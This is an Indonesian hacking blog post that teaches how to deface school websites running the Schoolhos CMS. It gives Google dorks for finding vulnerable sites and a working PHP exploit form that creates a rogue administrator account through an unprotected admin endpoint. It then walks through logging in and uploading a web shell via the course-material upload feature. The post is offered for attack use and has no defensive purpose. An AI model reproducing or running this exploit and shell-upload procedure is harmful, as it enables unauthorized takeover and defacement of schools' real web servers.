Selamat Datang Di Blog saya ^_^
»

TUTORIAL HACK SITUS SEKOLAH CMS SCHOOLHOS

Share lagi nih sobat cyb0rg404..
kali ini saya akan share tutorial deface web sekolah dengan cms schoolhos..
caranya gampang gampang susah..
dari pada lama ikuti aja tutor nya di bawah ini..


Exploit ini sangat mudah digunakan :)

 Google Dork: 

  • inurl:/?p=bukutamu 
  • intext:Schoolhos Free Open Source CMS


 Code :
<?php

 $self = $_SERVER["PHP_SELF"];

 echo 'Target';
echo "<form action=\"$self\" method=\"GET\"><input type=\"text\" name=\"url\"><input type=\"submit\"></form>";
if(!isset($_GET['url'])){
$url = "http://target.com/adminpanel/database/admin.php";
}else
{
$url = $_GET['url'];
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>!!Barrabravaz Everywhere!!</title>
 </head>
 <body>

 <h1>!!Barrabravaz Everywhere!!</h1>
<?php echo "Target is : $url"; ?>
<form id="target" method="post" action="<?php echo "$url"; ?>/adminpanel/aplikasi/database/admin.php?pilih=admin&untukdi=tambah">

 Isi username yang mau di isi <INPUT type="text"  name="username" value="barrabravaz"><br>
Pass nya<INPUT type="text"  name="password" value="barrabravaz"><br>

 <input type="submit" name="insert" value="Insert" >
</form>
</body>
</html> 

 ...
Teks yang berwarna hijau : Jangan ganti Title ya =) hormati yang buat ;) 

Teks yang berwarna kuning : ganti User & Pass nya dengan user&pass kamu :)
simpan file nya di notepad dan simpan dengan nama file extension .php
cara menggunakannya..

Isi target : www.target.sch.id

 lalu isi username & Password kamu..

 selanjutnya klik insert,dan otomatis akan dialihkan ke halaman /adminpanel/

 tinggal login ,masukin user&pass nya :)
....

 ....
sekarang cara upload file nya gan hehehe ( siapa tau gak tau caranya mau upload diamana )

 Pertama, login dulu di Adminpanel .
Seperti pada gambar berikut :


Setelah itu anda akan dihadapkan pada Menu Dashboard , dimana di Menu tsb adalah bagian terpenting di website CMS SCHOOLHOS karena penataan/pengaturan ada disitu :)
Pilih File Materi seperti pada gambar dibawah ,



 Lalu pilih Tambah .
Kemudian Anda akan dihadapkan pada menu Mata Pelajaran , Pilih Mata Pelajaran terserah anda =))
Lalu klik Lanjut
Next, 
Isi Judul Materi
File Materi  ( Upload shell anda )
Isi Deskripsi 
Guru Pengampu
Kemudian klik
Tambah



 Selamat! Shell anda telah berhasil mengupload shell kedalam website tsb. =))
Untuk memanggil shell , pilih button "Edit" seperti gambar dibawah :
Klik shell yg uda kalian upload tadi =)
TARAAA  >.<

Postingan terkait:

Add Comment

Belum ada tanggapan untuk "TUTORIAL HACK SITUS SEKOLAH CMS SCHOOLHOS"

Post a Comment

Subscribe to: Post Comments (Atom)